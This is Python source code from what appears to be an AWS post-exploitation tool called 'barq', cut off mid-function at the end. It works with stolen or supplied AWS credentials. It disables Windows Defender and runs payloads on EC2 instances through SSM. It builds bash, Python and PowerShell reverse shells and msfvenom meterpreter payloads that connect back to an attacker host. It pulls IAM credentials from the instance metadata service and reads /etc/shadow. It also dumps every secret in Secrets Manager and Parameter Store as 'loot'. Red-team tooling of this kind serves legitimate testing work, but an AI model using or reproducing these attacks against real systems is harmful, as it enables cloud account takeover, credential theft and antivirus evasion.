puts(color('[..] Disabling Windows Defender momentarily...'))
response = ssmclient.send_command(InstanceIds=[instanceid,],DocumentName=action,DocumentVersion='$DEFAULT',TimeoutSeconds=3600,Parameters={'commands':[disable_windows_defender()]})
commandid = response['Command']['CommandId']
success, result = wait_for_command_invocation(ssmclient,commandid,instanceid)
if not success:
puts(color('[!] Could not disable Windows Defender... Stopping command invocation...'))
return False
#stage2 run payload
puts(color('[..] Running payload...'))
time.sleep(3)
response = ssmclient.send_command(InstanceIds=[instanceid,],DocumentName=action,DocumentVersion='$DEFAULT',TimeoutSeconds=3600,Parameters={'commands':[payload]})
commandid = response['Command']['CommandId']
success, result = wait_for_command_invocation(ssmclient,commandid,instanceid)
if not success:
puts(color('[!] Could not run payload... Stopping command invocation...'))
return False
#stage3 enable windows defender.
if disableav:
time.sleep(30)
puts(color('[..] Enabling Windows Defender again....'))
response = ssmclient.send_command(InstanceIds=[instanceid,],DocumentName=action,DocumentVersion='$DEFAULT',TimeoutSeconds=3600,Parameters={'commands':[enable_windows_defender()]})
commandid = response['Command']['CommandId']
success, result = wait_for_command_invocation(ssmclient,commandid,instanceid)
if not success:
puts(color('[!] Could not enable Windows Defender... Stopping command invocation...'))
return False
return True
PRINT_EC2_METADATA_CMD = "python -c \"import requests, json; b = 'http://169.254.169.254/latest/';m='meta-data/';roleid = requests.get(b+m+'iam/security-credentials/').text; print '{RoleID: %s,'%roleid;print 'Credentials: %s,'%(requests.get(b+m+'iam/security-credentials/%s'%roleid).text); print 'AMIID: %s,'%(requests.get(b+m+'ami-id').text); print 'PublicIP: %s,'%(requests.get(b+m+'public-ipv4').text); print 'PublicHostname:%s,'%(requests.get(b+m+'public-hostname').text); print 'InstanceIdentityDocument: %s,'%(requests.get(b+'dynamic/instance-identity/document').text);print 'UserData:%s}'%(requests.get(b+'user-data/').text);\""
PRINT_EC2_METADATA_PSH = "$b = 'http://169.254.169.254/latest/';$m='meta-data/';$roleid = (Invoke-WebRequest -UseBasicParsing -Uri ($b+$m+'iam/security-credentials/')).Content;echo ('--->Role ID: '+$roleid);echo ('--->Credentials: '+($instanceId = Invoke-WebRequest -UseBasicParsing -Uri ($b+$m+'iam/security-credentials/'+$roleid)).Content);echo ('--->AMI-ID: '+($instanceId = Invoke-WebRequest -UseBasicParsing -Uri ($b+$m+'ami-id')).Content);echo ('--->Public IP: '+($instanceId = Invoke-WebRequest -UseBasicParsing -Uri ($b+$m+'public-ipv4')).Content);echo ('--->Public Hostname: '+($instanceId = Invoke-WebRequest -UseBasicParsing -Uri ($b+$m+'public-hostname')).Content);echo ('--->Instance Identity Document: '+($instanceId = Invoke-WebRequest -UseBasicParsing -Uri ($b+'dynamic/instance-identity/document')).Content);echo ('--->UserData: '+($instanceId = Invoke-WebRequest -UseBasicParsing -Uri ($b+'user-data/')));"
def choose_training_ami():
"""
Choose the AMI name for the training mode based on the OS choice.
:return: Tuple of OS and AMI name.
"""
puts(color('[*] Choose your EC2 OS:'))
ami_options = [{'selector':'1','prompt':'Linux','return':'linux'},
{'selector':'2','prompt':'Windows','return':'windows'}]
ami = prompt.options('Options:', ami_options)
if ami == 'windows':
return "windows",'Windows_Server-2019-English-Full-Base-2019.01.10'
return "linux",'amzn2-ami-hvm-2.0.20190115-x86_64-gp2'
def shellscript_options(OS):
"""
Prompts command options against an EC2 instance, depending on target OS.
:param OS: Target instance OS.
:return: Tuple of payload and action (AWS SSM DocumentName)
"""
disableav = False
puts(color('[*] Choose your payload:'))
if OS == 'linux':
payload_options = [{'selector':'1','prompt':'cat /etc/passwd','return':'cat /etc/passwd'},
{'selector':'2','prompt':'cat /ect/shadow','return':'cat /etc/shadow'},
{'selector':'3','prompt':'uname -a','return':'uname -a'},
{'selector':'4', 'prompt':'reverse shell to external host', 'return':'reverseshell'},
{'selector':'5','prompt':'whoami','return':'whoami'},
{'selector':'6','prompt':'metasploit','return':'msf'},
{'selector':'7','prompt':'print EC2 metadata and userdata (custom init script)','return':PRINT_EC2_METADATA_CMD},
{'selector':'8','prompt':'Visit a URL from inside EC2 instance','return':'URL'}]
action = 'AWS-RunShellScript'
else:
payload_options = [{'selector':'1','prompt':'ipconfig','return':'ipconfig'},
{'selector':'2', 'prompt':'reverse shell to external host', 'return':'reverseshell'},
{'selector':'3','prompt':'whoami','return':'whoami'},
{'selector':'4','prompt':'metasploit','return':'msf'},
{'selector':'5','prompt':'print EC2 metadata and userdata (custom init script)','return':PRINT_EC2_METADATA_PSH},
{'selector':'6','prompt':'Visit a URL from inside EC2 instance','return':'URL'}]
action = 'AWS-RunPowerShellScript'
payload = prompt.options('Payload:', payload_options)
remote_ip_host = ''
remote_port = ''
if payload == "reverseshell" or payload == "msf":
puts(color('[*] You chose %s option. First provide your remote IP and port to explore shell options.' %payload))
remote_ip_host = prompt.query('Your remote IP or hostname to connect back to:')
remote_port = prompt.query("Your remote port number:", default="4444")
if payload == "reverseshell":
payload, action = reverseshell_options(remote_ip_host, remote_port, OS)
elif payload == "msf":
payload, action = metasploit_installed_options(remote_ip_host, remote_port, OS)
disableav = True
elif payload == 'URL':
puts(color('[*] Choose the URL to visit from inside the EC2 instance:'))
URL = prompt.query('URL: ', default="http://169.254.169.254/latest/")
if OS == 'linux':
payload = "python -c \"import requests; print requests.get('%s').text;\"" %URL
else:
payload = "echo (Invoke-WebRequest -UseBasicParsing -Uri ('%s')).Content;" %URL
return payload,action, disableav
def reverseshell_options(host,port, OS):
"""
Prompts for reverse shell options against an EC2 instance depending on its OS.
:param host: The listening server's IP or hostname
:param port: Port to listen on for shells.
:param OS: OS of that target instance.
:return: Tuple of reverse shell payload and action (AWS SSM DocumentName)
"""
puts(color('[*] Choose your reverse shell type:'))
bash_shell = "bash -i >& /dev/tcp/%s/%s 0>&1" %(host, port)
python_shell = "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"%s\",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'" %(host, port)
powershell_shell = "$client = New-Object System.Net.Sockets.TCPClient(\"%s\",%s);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \"PS \" + (pwd).Path + \"> \";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" %(host, port)
if OS == "linux":
action = "AWS-RunShellScript"
shell_options = [{'selector':'1','prompt':'Bash reverse shell','return':bash_shell},
{'selector':'2','prompt':'Python reverse shell','return':python_shell},
{'selector':'3','prompt':'Empire Python Launcher','return':'empirepython'}]
else:
action = "AWS-RunPowerShellScript"
shell_options = [{'selector':'1','prompt':'Powershell reverse shell','return':powershell_shell},
{'selector':'2','prompt':'Empire Powershell Launcher','return':'empirepowershell'}]
reverseshell = prompt.options('Payload:', shell_options)
if reverseshell == 'empirepowershell' or reverseshell == 'empirepython':
puts(color('[*] Generate your Empire launcher code in empire and paste it here:'))
reverseshell = raw_input('Paste here:')
return reverseshell, action
def reverseshell_multiple_options( linux, windows):
"""
Prompts for reverse shell options against a range of EC2 instances depending on their OS.
:param linux: Whether or not there are any targeted instances running Linux.
:param windows: Whether or not there are any targeted instances running Windows.
:return: Tuple of reverse shell payloads for linux and windows.
"""
puts(color('[*] Choose your reverse shell type:'))
puts(color('[*] Make sure your listening server can handle multiple simultaneous reverse shell connections:'))
linuxattack = ''
windowsattack = ''
if linux:
linux_options = [{'selector':'1','prompt':'Bash reverse shell','return':'bash'},
{'selector':'2','prompt':'Python reverse shell','return':'python'},
{'selector':'3','prompt':'Empire Python Launcher','return':'empirepython'}]
linuxattack = prompt.options('Payload for Linux EC2 instances:', linux_options)
if linuxattack == 'empirepython':
puts(color('[*] Generate your Empire python launcher code in empire and paste it here:'))
linuxattack = raw_input('Paste here:')
else:
host = prompt.query('Your remote IP or hostname to connect back to:')
port = prompt.query("Your remote port number:", default="4444")
if linuxattack == 'bash':
linuxattack = "bash -i >& /dev/tcp/%s/%s 0>&1" %(host, port)
elif linuxattack == 'python':
linuxattack = "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"%s\",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'" %(host, port)
if windows:
windows_options = [{'selector':'1','prompt':'Powershell reverse shell','return':'powershell'},
{'selector':'2','prompt':'Empire Powershell Launcher','return':'empirepowershell'}]
windowsattack = prompt.options('Payload for Windows EC2 instances:', windows_options)
if windowsattack == 'empirepowershell':
puts(color('[*] Generate your Empire powershell launcher code in empire and paste it here:'))
windowsattack = raw_input('Paste here:')
else:
host = prompt.query('Your remote IP or hostname to connect back to:')
port = prompt.query("Your remote port number:", default="5555")
if windowsattack == 'powershell':
windowsattack = "$client = New-Object System.Net.Sockets.TCPClient(\"%s\",%s);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \"PS \" + (pwd).Path + \"> \";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" %(host, port)
return linuxattack,windowsattack
def metasploit_not_installed_options(host, port, OS):
"""
options in case metasploit is not locally installed on attack system.
TODO: Implement this
:param host: The listening server's IP or hostname
:param port: Port to listen on for shells.
:param OS: OS of that target instance.
:return: Nothing
"""
pass
def metasploit_installed_multiple_options( linux, windows):
"""
Prompts for metasploit options against a range of EC2 instances depending on their OS.
:param linux: Whether or not there are any targeted instances running Linux.
:param windows: Whether or not there are any targeted instances running Windows.
:return: Tuple of metasploit payloads for linux and windows.
"""
puts(color('[*] Choose your metasploit payload. This requires msfvenom to be installed in your system.'))
linux_tcp_meterpreterx64 = 'python/meterpreter/reverse_tcp'
linux_https_meterpreterx64 = 'python/meterpreter/reverse_https'
linux_tcp_shell = 'python/shell_reverse_tcp'
windows_tcp_meterpreterx64 = 'windows/x64/meterpreter/reverse_tcp'
windows_https_meterpreterx64 = 'windows/x64/meterpreter/reverse_https'
windows_tcp_shell = 'windows/x64/shell/reverse_tcp'
linuxattack = ''
windowsattack = ''
#remote_ip_host = prompt.query('Your remote IP or hostname to connect back to:')
#remote_port = prompt.query("Your remote port number:", default="4444")
if linux:
linux_options = [{'selector':'1','prompt':'Linux Meterpreter reverse TCP x64','return':linux_tcp_meterpreterx64},
{'selector':'2','prompt':'Linux Meterpreter reverse HTTPS x64','return':linux_https_meterpreterx64},
{'selector':'3','prompt':'Linux TCP Shell','return':linux_tcp_shell}]
linuxpayload = prompt.options('Payload for Linux EC2 instances:', linux_options)
host = prompt.query('Your remote IP or hostname to connect back to:')
port = prompt.query("Your remote port number (Listener ports should be different for linux and windows):", default="4444")
linuxmsfshell = 'msfvenom -a python --platform python -p %s LHOST=%s LPORT=%s -f raw --smallest' %(linuxpayload,host, port)
puts(color('[*] Run the following command on your remote listening server to run the linux payload handler:'))
msfconsole_cmd = "msfconsole -x 'use exploit/multi/handler; set LHOST %s; set lport %s; set payload %s;run -j;'" %(host, port, linuxpayload)
puts(colored.magenta(msfconsole_cmd))
linuxattack = os.popen(linuxmsfshell).read()
linuxattack = "python -c \"%s\"" %linuxattack
if windows:
windows_options = [{'selector':'1','prompt':'Windows Meterpreter reverse TCP x64','return':windows_tcp_meterpreterx64},
{'selector':'2','prompt':'Windows Meterpreter reverse HTTPS x64','return':windows_https_meterpreterx64},
{'selector':'3','prompt':'Windows TCP Shell','return':windows_tcp_shell}]
windowspayload = prompt.options('Payload for Windows EC2 instances:', windows_options)
host = prompt.query('Your remote IP or hostname to connect back to:')
port = prompt.query("Your remote port number (Listener ports should be different for linux and windows):", default="5555")
windowsmsfshell = 'msfvenom -a x64 --platform Windows -p %s LHOST=%s LPORT=%s --f psh-net --smallest' %(windowspayload, host, port)
puts(color('[*] Run the following command on your remote listening server to run the windows payload handler:'))
msfconsole_cmd = "msfconsole -x 'use exploit/multi/handler; set LHOST %s; set lport %s; set payload %s;run -j;'" %(host, port, windowspayload)
puts(colored.magenta(msfconsole_cmd))
windowsattack = os.popen(windowsmsfshell).read()
return linuxattack, windowsattack
def metasploit_installed_options(host, port, OS):
"""
Prompts for metasploit options against an EC2 instance depending on its OS.
:param host: IP or hostname of the listening server running metasploit exploit handler.
:param port: The port the exploit handler is listening on.
:param OS: The OS of the target instance
:return: Tuple of reverse shell payloads for linux and windows.
"""
puts(color('[*] Choose your metasploit payload. This requires msfvenom to be installed in your system.'))
#output = os.popen("msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f psh --smallest").read()`
linux_tcp_meterpreterx64 = 'python/meterpreter/reverse_tcp'
linux_https_meterpreterx64 = 'python/meterpreter/reverse_https'
linux_tcp_shell = 'python/shell_reverse_tcp'
windows_tcp_meterpreterx64 = 'windows/x64/meterpreter/reverse_tcp'
windows_https_meterpreterx64 = 'windows/x64/meterpreter/reverse_https'
windows_tcp_shell = 'windows/x64/shell/reverse_tcp'
if OS == 'linux':
action = 'AWS-RunShellScript'
shell_options = [{'selector':'1','prompt':'Linux Meterpreter reverse TCP x64','return':linux_tcp_meterpreterx64},
{'selector':'2','prompt':'Linux Meterpreter reverse HTTPS x64','return':linux_https_meterpreterx64},
{'selector':'3','prompt':'Linux TCP Shell','return':linux_tcp_shell}]
else:
action = 'AWS-RunPowerShellScript'
shell_options = [{'selector':'1','prompt':'Windows Meterpreter reverse TCP x64','return':windows_tcp_meterpreterx64},{'selector':'2','prompt':'Windows Meterpreter reverse HTTPS x64','return':windows_https_meterpreterx64},
{'selector':'3','prompt':'Windows TCP Shell','return':windows_tcp_shell}]
payload = prompt.options('Payload:', shell_options)
if OS == 'linux':
msfshell = 'msfvenom -p %s LHOST=%s LPORT=%s -f raw --smallest' %(payload,host, port)
else:
msfshell = 'msfvenom -p %s LHOST=%s LPORT=%s --f psh-net --smallest' %(payload, host, port)
puts(color('[*] Run the following command on your reverse server running the handler:'))
msfconsole_cmd = "msfconsole -x 'use exploit/multi/handler; set LHOST %s; set lport %s; set payload %s;run -j;'" %(host, port, payload)
puts(colored.magenta(msfconsole_cmd))
shellcode = os.popen(msfshell).read()
if OS == 'linux':
shellcode = "python -c \"%s\"" %shellcode
return shellcode, action
def start_training_mode(caller):
"""
Start the training mode.
:param caller: menu that called this function
:return: None
"""
global my_aws_creds
mysession = ''
try:
mysession = my_aws_creds['session']
except:
puts(color("[!] Error! No EC2 credentials set. Call setprofile first!"))
go_to_menu(caller)
ec2resource = mysession.resource('ec2')
iamresource = mysession.resource('iam')
ssmclient = mysession.client('ssm')
iamclient = mysession.client('iam')
ec2client = mysession.client('ec2')
with indent(6, quote=">>>>"):
puts(color('[*] Training mode entered'))
puts(color('[..] preparing environment....'))
AssumeRolePolicydata = {'Version': '2012-10-17','Statement': {'Effect': 'Allow','Principal': {'Service': 'ec2.amazonaws.com'},'Action': 'sts:AssumeRole'}}
puts(color('[..] Creating Assume Role Policy...'))
rolename = 'role'+ id_generator()
puts(color('[..] Creating role with name: %s'%rolename))
role = iamresource.create_role(RoleName=rolename,AssumeRolePolicyDocument=json.dumps(AssumeRolePolicydata))
puts(color("[+] Role created successfully."))
puts(color('[..] Attaching needed policies for role...'))
responseforrole = iamclient.attach_role_policy(RoleName=role.name, PolicyArn='arn:aws:iam::aws:policy/service-role/AmazonEC2RoleforSSM')
puts(color('[+] Role attached successfully to policy AmazonEC2RoleforSSM'))
puts(color('[..] Creating EC2 instance profile and adding it to role...'))
instance_profile = iamresource.create_instance_profile(InstanceProfileName=role.name)
instance_profile.add_role(RoleName=role.name)
OS,amznlnxaminame = choose_training_ami()
puts(color('[+] OS chosen is: %s'%OS))
#"amzn2-ami-hvm-2.0.20190115-x86_64-gp2" #"amzn-ami-hvm-2018.03.0.20180811-x86_64-ebs"
puts(color('[+] Amazon AMI used is: %s'%amznlnxaminame))
ami_images = list(ec2resource.images.filter(Filters=[{'Name':'name','Values':[amznlnxaminame,]}]))
amznamiid = ami_images[0].image_id
puts(color('[..] Now creating EC2 instance of type t2.micro with this AMI....'))
time.sleep(10)
newinstances = ec2resource.create_instances(ImageId=amznamiid, InstanceType='t2.micro',MinCount=1,MaxCount=1, IamInstanceProfile={'Name':role.name})
newinstance = newinstances[0]
puts(color('[+] EC2 instance id is: %s'%newinstance.id))
puts(color('[..] Waiting for EC2 instance to complete running..... This will take a while'))
newinstance.wait_until_running()
newinstance.reload()
puts(color('[+] EC2 instance state is: %s'%newinstance.state))
payload,action, disableav = shellscript_options(OS)
puts(color('[..] Sending the command "%s" to the running instance....'%payload))
instanceid = newinstance.id
time.sleep(10)
if OS == 'linux':
success = run_linux_command(ssmclient,instanceid,action,payload)
else:
puts(color('[..] Waiting for Windows EC2 instance to be ready... waiting for 2 minutes...'))
time.sleep(120)
success = run_windows_command(ssmclient,instanceid, action, payload, disableav)
#########
#########
puts(color('[+] Training mode done... Now terminating EC2 instance and deleting IAM role...'))
newinstance.terminate()
puts(color('[..] Waiting for instance to be terminated...'))
newinstance.wait_until_terminated()
puts(color('[+] EC2 instance terminated. Now detaching policy and deleting role...'))
instance_profile.remove_role(RoleName=role.name)
instance_profile.delete()
role.detach_policy(PolicyArn='arn:aws:iam::aws:policy/service-role/AmazonEC2RoleforSSM')
role.delete()
puts(color('[+] Done!'))
go_to_menu(caller)
def process_training_command(command):
"""
Process command in the training menu.
:param command: The command to process.
:return: None
"""
global menu_stack
if command == 'help':
training_help()
elif command == 'where':
puts(colored.green("You are in training menu"))
elif command == 'setprofile':
set_aws_creds('training')
elif command == 'start':
start_training_mode('training')
elif command == 'back':
#handle_menu()
menu_backward()
elif command == 'showprofile':
show_aws_creds('training')
elif command == 'exit':
exit()
training_loop()
""" pass
elif command == 'setprofile':
set_aws_creds('main')
elif command == 'showprofile':
show_aws_creds('main')
elif command == 'dumpsecrets':
find_all_creds('main')
elif command == 'attacksurface':
find_attacksurface('main')
"""
global INSTANCESIDCOMMANDS
INSTANCESIDCOMMANDS = []
def instanceidcomplete(text, state):
"""
Auto complete for Instance ID table.
"""
global INSTANCESIDCOMMANDS
for cmd in INSTANCESIDCOMMANDS:
if cmd.startswith(text):
if not state:
return cmd
else:
state -= 1
def get_instance_details(caller):
"""
Return detailed info in JSON format about a particular instance.
:param caller: The menu that called this function.
:return: None
"""
global my_aws_creds
global ec2instances
global INSTANCESIDCOMMANDS
INSTANCESIDCOMMANDS = []
mysession = ''
try:
mysession = my_aws_creds['session']
possible_regions = my_aws_creds['possible_regions']
except:
puts(color("[!] Error! No EC2 credentials set. Call setprofile first!"))
go_to_menu(caller)
try:
puts(color('[*] Your collected EC2 instances, if you want an updated list, invoke attacksurface:'))
instances_table = PrettyTable()
possible_regions = []
instances_table.field_names = ['Instance ID', 'Platform', 'Region', 'State', 'Public IP', 'Public DNS name',
'Profile']
if len(ec2instances['instances']) == 0:
puts(color('[!] You have no stored EC2 instances. Run the command attacksurface to discover them'))
go_to_menu(caller)
for ins in ec2instances['instances']:
INSTANCESIDCOMMANDS.append(ins['id'])
instances_table.add_row([ins.get('id'), ins.get('platform'), ins.get('region'), ins.get('state'),
ins.get('public_ip_address'),
ins.get('public_dns_name'), ins.get('iam_profile', '')])
except Exception as e:
print(e)
puts(color('[!] You have no stored EC2 instances. Run the command attacksurface to discover them'))
go_to_menu(caller)
print(instances_table)
puts(color('[*] Target Options:'))
#paster
readline.set_completer_delims(' \t\n;')
readline.parse_and_bind("tab: complete")
readline.set_completer(instanceidcomplete)
target = prompt.query('Type/Paste your target EC2 ID:')
region = ''
for ins in ec2instances['instances']:
if ins['id'] == target:
region = ins['region']
break;
ec2client = mysession.client('ec2',region_name=region)
result = ec2client.describe_instances(InstanceIds=[target,])
jsonstr = json.dumps(result['Reservations'][0]['Instances'][0],indent=4, sort_keys=True, default=str)
print(highlight(jsonstr, JsonLexer(), TerminalFormatter()))
go_to_menu(caller)
def process_instances_command(command):
"""
Process command in the EC2 instances menu.
:param command: The command to process.
:return: None
"""
global menu_stack
if command == 'help':
instances_help()
elif command == 'where':
puts(colored.green("You are in EC2 instances menu"))
elif command == 'setprofile':
set_aws_creds('ec2instances')
elif command == 'showprofile':
show_aws_creds('ec2instances')
elif command == 'dumpsecrets':
find_all_creds('ec2instances')
elif command == 'attacksurface':
find_attacksurface('ec2instances')
elif command == 'showsecrets':
show_cred_loot('ec2instances')
elif command == 'securitygroups':
get_security_groups('ec2instances')
elif command == 'ec2attacks':
ec2attacks('ec2instances')
elif command == 'back':
#handle_menu()
menu_backward()
elif command == 'list':
get_ec2_instances('ec2instances')
elif command == 'showsecrets':
show_aws_creds('ec2instances')
elif command == 'commandresults':
check_command_invocations('ec2instances')
elif command == 'instance':
get_instance_details('ec2instances')
elif command == 'exit':
exit()
instances_loop()
def instances_loop():
"""
The command handler loop for the EC2 instances menu. Commands will be sent to the processor and the prompt will be displayed.
:return: None
"""
try:
command = ''
while command == '':
try:
readline.set_completer_delims(' \t\n;')
readline.parse_and_bind("tab: complete")
readline.set_completer(instancecomplete)
command = raw_input('barq '+color('instances','blue')+' > ')
except Exception as e:
print(e)
command = str(command)
process_instances_command(command)
except KeyboardInterrupt as k:
print("CTRL+C pressed.")
choice = prompt.query(color("Are you sure you want to go back to the main menu? Y/N",'red'), default='Y')
if choice == 'Y':
menu_backward()
else:
instances_loop()
def main_loop():
"""
The command handler loop for the main menu. Commands will be sent to the processor and the prompt will be displayed.
:return: None
"""
try:
command = ''
while command == '':
try:
readline.set_completer_delims(' \t\n;')
readline.parse_and_bind("tab: complete")
readline.set_completer(maincomplete)
command = raw_input('barq '+color('main','green')+' > ')
except Exception as e:
exit()
#command = prompt.query('aws sheller main> ', validators=[])
command = str(command)
process_main_command(command)
except KeyboardInterrupt as k:
print(color("CTRL+C pressed. Exiting...",'red'))
exit()
def process_main_command(command):
"""
Process command in the main menu.
:param command: The command to process.
:return: None
"""
global menu_stack
if command == 'help':
main_help()
elif command == 'where':
puts(colored.green('You are in the main menu'))
elif command == 'back':
puts(colored.green('You are the at the top menu.'))
elif command == 'exit':
#cleanup tasks
try:
exit()
except:
pass
elif command == 'setprofile':
set_aws_creds('main')
elif command == 'showprofile':
show_aws_creds('main')
elif command == 'dumpsecrets':
find_all_creds('main')
elif command == 'attacksurface':
find_attacksurface('main')
elif command == 'showsecrets':
show_cred_loot('main')
elif command == 'securitygroups':
get_security_groups('main')
elif command == 'training':
#menu_stack.append('training')
#handle_menu()
menu_forward('training')
elif command == 'ec2instances':
menu_forward('ec2instances')
main_loop()
def find_all_creds(caller):
"""
Find Secrets and Parameters stored in AWS Secrets Manager or Systems Manager Parameter store, respectively, for each region.
:param caller: calling menu to return to.
:return: None
"""
global my_aws_creds
global loot_creds
mysession = ''
try:
mysession = my_aws_creds['session']
possible_regions = my_aws_creds['possible_regions']
except:
puts(color("[!] Error! No EC2 credentials set. Call setprofile first!"))
go_to_menu(caller)
loot_creds = {'secrets':[],'tokens':[],'parameters':[]}
puts(color('[..] Now iterating over all regions to get secrets and parameters...'))
for region in possible_regions:
puts(color('[*] Region currently searched for secrets: %s'%region))
puts(color('[..] Now searching for secrets in Secret Manager'))
#if my_aws_creds['aws_session_token'] == '':
# mysession = boto3.session.Session(aws_access_key_id=my_aws_creds['aws_access_key_id'],aws_secret_access_key=my_aws_creds['aws_secret_access_key'],region_name=region)
#else:
#mysession = boto3.session.Session(aws_access_key_id=my_aws_creds['aws_access_key_id'],aws_secret_access_key=my_aws_creds['aws_secret_access_key'],region_name=region,aws_session_token=my_aws_creds['aws_session_token'])
mysession = boto3.session.Session(aws_access_key_id=my_aws_creds['aws_access_key_id'],
aws_secret_access_key=my_aws_creds['aws_secret_access_key'],
region_name=region, aws_session_token=my_aws_creds['aws_session_token'])
secretsclient = mysession.client(service_name='secretsmanager',region_name=region)
try:
secrets = secretsclient.list_secrets()['SecretList']
secretnames = []
for secret in secrets:
secretnames.append(secret['Name'])
for name in secretnames:
resp = secretsclient.get_secret_value(SecretId=name)
puts(color("Secret Name: %s" %name,"green"))
puts(color("Secret Value: %s" %resp['SecretString'],"green"))
resp2 = secretsclient.describe_secret(SecretId=name)
description = resp2.get('Description','')
loot_creds['secrets'].append({'name':name,'value':resp['SecretString'],'description':description})
except Exception as e:
print(e)
puts(color('[!] No secrets in this region\'s Secret Manager...'))
puts(color('[..] Now searching for secrets in Parameter Store'))
ssmclient = mysession.client('ssm',region_name=region)
try:
paramresponse = ssmclient.describe_parameters()
paramnames = []
for param in paramresponse.get('Parameters',[]):
if param.get('Name','') != '':
paramnames.append(param.get('Name'))
if len(paramnames) > 0:
getparamsresponse = ssmclient.get_parameters(Names=paramnames,WithDecryption=True).get('Parameters')
for getparam in getparamsresponse:
puts(color("Parameter Name: %s, Parameter Value: %s" %(getparam['Name'], getparam['Value']),"green"))
loot_creds['parameters'].append({'name':getparam['Name'],'value':getparam['Value']})
except Exception as e:
print(e)
puts(color('[!] No Paramters in this region\'s Parameter Store...'))
puts(color("[+] Done iterating on AWS secrets and parameters."))
go_to_menu(caller)
def show_cred_loot(caller):
"""
Show Secrets and Parameters looted from AWS Secrets Manager or Systems Manager Parameter store, respectively, for each region.
:param caller: calling menu to return to
:return: None
"""
global loot_creds
try:
if len(loot_creds.get('secrets')) < 1:
puts(color('[!] You have no stored secrets or parameters. Run the command dumpsecrets to set them'))
go_to_menu(caller)
puts(color('[*] Your collected secrets and credentials:'))
for secret in loot_creds['secrets']:
puts(color("===========",'blue'))
puts(color('[+] Name: %s'%secret.get('name')))
puts(color('[+] Value: %s' % secret.get('value')))
puts(color('[+] Description: %s' % secret.get('description')))
#puts(colored.green('name: %s, value: %s, description: %s'%(secret.get('name'),secret.get('value'), secret.get('description',''))))
for param in loot_creds['parameters']:
puts(color("===========", 'blue'))
puts(color('[+] Name: %s' % param.get('name')))
puts(color('[+] Value: %s' % param.get('name')))
#puts(colored.green('name: %s, value: %s'%(param.get('name'),param.get('value'))))
except Exception as e:
print(e)
puts(color('[!] A problem in finding stored secrets or parameters. Run the command dumpsecrets to set them'))
go_to_menu(caller)
def get_ec2_instances(caller):
"""
List discovered EC2 instances.
:param caller: Calling menu to return to.
:return: None
"""
global ec2instances
try:
puts(color('[*] Your collected EC2 instances, if you want an updated list, invoke attacksurface:'))
instances_table = PrettyTable()
instances_table.field_names = ['Instance ID', 'Platform', 'Region', 'State', 'Public IP', 'Public DNS name',
'Profile']
for ins in ec2instances['instances']:
instances_table.add_row([ins.get('id'), ins.get('platform'), ins.get('region'), ins.get('state'),
ins.get('public_ip_address'),
ins.get('public_dns_name'), ins.get('iam_profile', '')])
print(instances_table)
except:
puts(color('[!] You have no stored EC2 instances. Run the command attacksurface to discover them'))
go_to_menu(caller)
def get_security_groups(caller):
"""
List security groups discovered.
:param caller: calling menu to return to.
:return: None
"""
global secgroups
try:
puts(color('[*] Your collected security groups, if you want an updated list, invoke attacksurface:'))
for group in secgroups['groups']:
puts(colored.green("Group ID: %s"%group.get('id','')))
puts(colored.green("Group description: %s"%group.get('description','')))
puts(colored.green('Group Ingress IP permissions:'))
for p in group['ip_permissions']:
ranges = ''
for iprange in p.get('ranges',[]):
ranges = ranges + '%s,' %iprange['CidrIp']
if len(ranges) > 1 and ranges[-1] == ',':
ranges = ranges[:-1]
puts(colored.green('From Port: %s, To Port: %s, Protocol: %s, IP Ranges: %s' %(p.get('fromport','Any'),p.get('toport','Any'),p.get('protocol','All'),ranges)))
puts(colored.green('Group Egress IP permissions:'))
for p in group['ip_permissions_egress']:
ranges = ''
for iprange in p.get('ranges',[]):
ranges = ranges + '%s,' %iprange['CidrIp']
if len(ranges) > 1 and ranges[-1] == ',':
ranges = ranges[:-1]
puts(colored.green('From Port: %s, To Port: %s, Protocol: %s, IP Ranges: %s' %(p.get('fromport','Any'),p.get('toport','Any'),p.get('protocol','All'),ranges)))
puts(colored.magenta('======================================='))
except Exception as e:
print(e)
puts(color('[!] You have no stored security groups. Run the command attacksurface to discover them'))
go_to_menu(caller)
def ec2attacks(caller):
"""
Perform various attacks against All eligible EC2 instances in the account, or choose a single EC2 instance to attack.
:param caller: Calling menu to return to.
:return: None
"""
global my_aws_creds
global ec2instances
global INSTANCESIDCOMMANDS
INSTANCESIDCOMMANDS = []
mysession = ''
linux = False
windows = False
actual_targets = []
try:
mysession = my_aws_creds['session']
possible_regions = my_aws_creds['possible_regions']
except:
puts(color("[!] Error! No EC2 credentials set. Call setprofile first!"))
go_to_menu(caller)
try:
puts(color('[*] Your collected EC2 instances, if you want an updated list, invoke attacksurface:'))
instances_table = PrettyTable()
possible_regions = []
instances_table.field_names = ['Instance ID', 'Platform', 'Region', 'State', 'Public IP', 'Public DNS name', 'Profile']
if len(ec2instances['instances']) == 0:
puts(color('[!] You have no stored EC2 instances. Run the command attacksurface to discover them'))
go_to_menu(caller)
for ins in ec2instances['instances']:
if ins.get('iam_profile','') != '' and ins.get('state','') == 'running':
instances_table.add_row([ins.get('id'),ins.get('platform'),ins.get('region'),ins.get('state'),ins.get('public_ip_address'),
ins.get('public_dns_name'),ins.get('iam_profile','')])
actual_targets.append(ins)
INSTANCESIDCOMMANDS.append(ins['id'])
if ins.get('platform') == 'linux':
